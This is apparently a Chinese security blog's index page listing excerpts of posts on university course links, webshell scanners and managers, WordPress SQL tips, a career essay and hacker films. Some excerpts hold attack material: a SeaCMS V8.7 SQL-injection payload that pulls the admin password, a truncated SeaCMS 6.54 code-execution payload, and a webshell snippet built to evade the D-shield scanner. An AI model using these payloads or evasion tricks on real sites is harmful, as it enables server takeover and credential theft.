体验盒子

关注网络安全,网络安全博客
GitHub上各大高校课程资料及国外公开课视频
[置顶] GitHub上各大高校课程资料及国外公开课视频

Github上的大学课程资料,目前可以选择的大学包括清华大学、北京大学、上海交通大学、中国科学技术大学、中山大学/课程资料,还有国外名牌大学公开,包括斯坦福、麻省理工等。 直接可以在github上大学了。北京大学课程资料https://github.com/lib-pku/libpkuhttps://github.com/tongtzeho/PKUCourse北京大学github课程中第二个...

8 天前 周边
7款WebShell扫描检测查杀工具
[置顶] 7款WebShell扫描检测查杀工具

webshell是一种可以在web服务器上执行后台脚本或者命令的后门,黑客通过入侵网站上传webshell后获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。而WebShell扫描检测工具可辅助查出该后门。WebShell扫描工具适用网上下载的源码特定文件检测是否是木马检测目标程序或文件是否存...

17 天前 安全工具
“冰蝎”动态二进制加密网站管理客户端 – WebShell管理工具
[置顶] “冰蝎”动态二进制加密网站管理客户端 – WebShell管理工具

冰蝎 Behinder“冰蝎”动态二进制加密网站管理客户端,80我们用中国菜刀,90我们用中国蚁剑antSword,可能00开始我们有了“冰蝎 ”WebShell管理工具。同时非常有必要先了解“那些强悍的PHP一句话后门”。“冰蝎”动态二进制加密网站管理客户端冰蝎 Behinder 功能原理《利用动态二进制加密实现新型一句话木马之客户端篇》 https...

2019-03-20 安全工具
全球DNS服务器地址 – 常用DNS
[置顶] 全球DNS服务器地址 – 常用DNS

全球公共域名解析服务器IP地址列表(Global Public DNS Servers IP Addresses List)『公共 DNS(Public DNS)/公共域名解析服务(Public DNS Service)』『递归DNS(Recursive DNS)/本地DNS(Local DNS)』公共DNS服务器/常用DNSIP地址(Public DNS Servers IP Addresses)DNS服务器DNS(Domain Name System,域名系统),因特网...

2019-03-18 周边
中国蚁剑AntSword:开源的跨平台WebShell管理工具
[置顶] 中国蚁剑AntSword:开源的跨平台WebShell管理工具

中国蚁剑AntSword中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。核心功能Shell代理功能Shell管理文件管理虚拟终端数据库管理插件市场插件开发开发版本针对有一定编程基础的开发者,你可以根据阅读文档或者分析源码了解...

2016-08-03 安全工具
WordPress删除重复的自定义字段
WordPress删除重复的自定义字段

把自定义字段修改成你的,执行SQL就行,记得务必先备份数据库 delete from wp_postmeta where meta_id in ( select * from ( select meta_id from wp_postmeta a where a.meta_key = '你的自定义字段' and meta_id not in ( ...

1 天前 WordPress
WordPress自定义字段排序,批量添加自定义字段和值
WordPress自定义字段排序,批量添加自定义字段和值

WordPress自定义字段排序根据自定义字段news_sort的数字字段从小到大进行排序 $args = array( 'post_type' => 'news', 'orderby' => array( 'meta_value_num'=>'ASC' //ASC OR DESC ), 'meta_key' => 'news_sort', ); $query = new WP_Query( $args ); ...

2 天前 WordPress
海洋CMS V8.7 SQL注入漏洞
海洋CMS V8.7 SQL注入漏洞

海洋CMS V8.7漏洞payload /upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27` 1 /upload/comment/api/index.php?gid=1&page=2&r...

3 天前 Vulndb
海洋CMS V6.45 – V6.55前台Getshell 代码执行漏洞
海洋CMS V6.45 – V6.55前台Getshell 代码执行漏洞

海洋CMS v6.54漏洞漏洞代码执行Payload get: http://seacms.test/search.phpPOST: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage...

3 天前 Vulndb
[译] 我是如何完成从码农到管理层的过渡的
[译] 我是如何完成从码农到管理层的过渡的

我从来就没想过有一天我会当上经理。 在畅想未来的时候,我会想当一名码农,直到我挣够了钱就考虑转行。我甚至考虑过完全不相关的事,比如开一家餐馆(当我开始按照 J. Kenji López-Alt 的食谱进行烹饪时,会有点忘乎所以),或者买下农场,过上农场主的生活(老实说,只是因为我玩了太多的《星露谷物语》(Stardew Valley...

3 天前 职场
中国蚁剑antSword RCE漏洞第二波,赶紧升升升
中国蚁剑antSword RCE漏洞第二波,赶紧升升升

四天前爆出了第一个中国蚁剑RCE漏洞,今天再被挖出一个,github已经修复,各位git pull跟上。漏洞分析首先对蚁剑进行复测,发现分类目录处的XSS并没有被修复,可能因为过于鸡肋项目方忽略了。(不过需要右键点击空白处)接着我们复测了之前的RCE,发现该漏洞已被过滤修复,我们来简单分析一下是怎么修复的。新加上用...

3 天前 Vulndb
过D盾Shell新思路分析
过D盾Shell新思路分析

在先知上看到了一个shell过D盾的思路,同样可用来过其它waf。D盾扫描结果以前的思路常规,就是定义一个变量b:$b='';为空,$b = null;,$b = "\n";然后变量a: $a = $_GET['1'];,eval($a.$b);,或者eval($b.=$a); 。但是现在这种方法基本报一级或者直接杀,查出某个变量。 <?php $m=...

4 天前 免杀
163邮箱IMAP/SMTP设置,客户端授权码
163邮箱IMAP/SMTP设置,客户端授权码

163邮箱使用邮件客户端收发信时,需要设置IMAP/SMTP,在IOS端无法获得163的IMAP/SMTP服务信息,只能手动填写。163邮箱IMAP/SMTP地址IOS地址,我的设置这个才可以appleimap.163.comapplesmtp.163.com其它地址,来自官方imap.163.comsmtp.163.compop3.163.com163邮箱开通客户端授权直接点客户端授权密码,开...

4 天前 日志
Adblock Plus订阅列表机制漏洞,可在网页中执行任意代码
Adblock Plus订阅列表机制漏洞,可在网页中执行任意代码

国外安全专家Sebastian近日发现Adblock Plus、AdBlock和uBlock浏览器扩展的广告拦截过滤器列表存在漏洞,攻击者可以利用该漏洞运行恶意代码,可窃取用户的cookie、登录凭据、进行页面重定向或其他恶意行为。受影响的扩展拥有超过1亿活跃用户,并且该功能可以轻松利用以攻击任何足够复杂的Web服务(如Google服务),而攻击很难检测并且可以在...

4 天前 Vulndb
9部有史以来最好的黑客电影
9部有史以来最好的黑客电影

电影和电视节目长期影响着立法者和社会对信息安全的看法。但我们应从艺术的角度来欣赏黑客电影。这并不是全部必看的黑客电影列表,顺序不分先后。Hackers 黑客这个类型的同名电影,恰当地称为黑客,旋转了白帽黑客与黑帽斗争的故事。Dade是一名电脑天才,在他11岁的时候他已经侵入华尔街的金融公司系统并差点令股市崩溃。由...

5 天前 影评